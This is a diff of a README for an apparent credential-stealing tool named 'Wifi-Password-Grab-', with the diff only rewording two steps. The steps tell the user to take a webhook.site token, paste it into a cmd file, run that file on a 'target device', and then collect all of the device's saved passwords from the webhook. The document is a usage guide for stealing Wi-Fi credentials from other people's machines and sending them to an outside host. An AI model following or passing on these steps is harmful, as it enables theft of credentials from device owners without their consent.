Cyberior1/Wifi-Password-Grab-/README.md

 1. Go to https://webhook.site  and copy your webhook token.

-2.Paste webhook token to code.
+2.Paste webhook token in cmd code file and save it.

 3.Execuate this cmd file in target device.

-4. Visit your webhook site and you will find all saved passwords in target device.
+4.Visit your webhook site and you will find all saved passwords in target device.